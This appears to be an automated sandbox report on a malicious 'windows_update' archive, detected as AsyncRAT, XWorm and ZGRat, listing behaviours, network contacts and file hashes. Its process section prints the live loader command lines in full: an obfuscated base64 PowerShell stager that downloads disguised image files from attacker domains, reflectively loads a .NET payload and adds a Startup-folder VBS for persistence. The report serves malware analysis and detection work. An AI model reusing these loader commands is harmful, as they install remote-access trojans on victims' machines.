Analysis Overview
SHA256
b471f3f22ac4c66fcf7419df31431552ce8f5ac8222b1398e0d1016824e95dcf
Threat Level: Known bad
The file 19042024_1547_windows_update.zip was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
ZGRat
Detect Xworm Payload
Detect ZGRat V1
Async RAT payload
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-19 07:49
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20231129-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\file.ps1
Network
Files
memory/2468-4-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2468-5-0x00000000029E0000-0x00000000029E8000-memory.dmp
memory/2468-6-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2468-7-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-8-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2468-9-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-11-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-10-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-12-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2468-13-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2468-14-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-15-0x0000000002C80000-0x0000000002D00000-memory.dmp
memory/2468-16-0x0000000002C80000-0x0000000002D00000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240226-en
Max time kernel
134s
Max time network
146s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2252 wrote to memory of 5060 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2252 wrote to memory of 5060 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5060 wrote to memory of 3828 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5060 wrote to memory of 3828 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3828 wrote to memory of 4352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3828 wrote to memory of 4352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTrebwBkDgTreGUDgTrebgBjDgTreGsDgTrebwDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.odencko/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5164 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
| US | 8.8.8.8:53 | 30.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrz3l0qr.w4f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5060-9-0x000001566BC20000-0x000001566BC42000-memory.dmp
memory/5060-19-0x00007FF893D60000-0x00007FF894821000-memory.dmp
memory/5060-20-0x000001566BCB0000-0x000001566BCC0000-memory.dmp
memory/5060-21-0x000001566BCB0000-0x000001566BCC0000-memory.dmp
memory/3828-22-0x00007FF893D60000-0x00007FF894821000-memory.dmp
memory/3828-23-0x000002882A830000-0x000002882A840000-memory.dmp
memory/3828-24-0x000002882A830000-0x000002882A840000-memory.dmp
memory/5060-25-0x000001566BCB0000-0x000001566BCC0000-memory.dmp
memory/3828-26-0x000002882A830000-0x000002882A840000-memory.dmp
memory/3828-27-0x0000028810710000-0x000002881075E000-memory.dmp
memory/4352-28-0x00007FF893D60000-0x00007FF894821000-memory.dmp
memory/4352-29-0x00000262503B0000-0x00000262503C0000-memory.dmp
memory/4352-39-0x00000262503B0000-0x00000262503C0000-memory.dmp
memory/4352-40-0x00000262503B0000-0x00000262503C0000-memory.dmp
memory/4352-47-0x00007FF893D60000-0x00007FF894821000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4f83e6b9df15851d271e8fbb8d137c9d |
| SHA1 | 52a44ba02fd59791f303362bbab53451ff48932e |
| SHA256 | d12625e429c0df81d4e9cc99d25d64e4c091c76992ef035fb9816a4b8a973fe0 |
| SHA512 | 4e67a88c08e1796d4c6717a757355ca03cdb9aa594527340e6bb873fee7f97cdd5012fe53064cfdae7d89417ab4d80c71b5acc0fe733acc2273063680198b68a |
memory/3828-51-0x00007FF893D60000-0x00007FF894821000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 235a8eb126d835efb2e253459ab8b089 |
| SHA1 | 293fbf68e6726a5a230c3a42624c01899e35a89f |
| SHA256 | 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686 |
| SHA512 | a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92 |
memory/5060-54-0x00007FF893D60000-0x00007FF894821000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
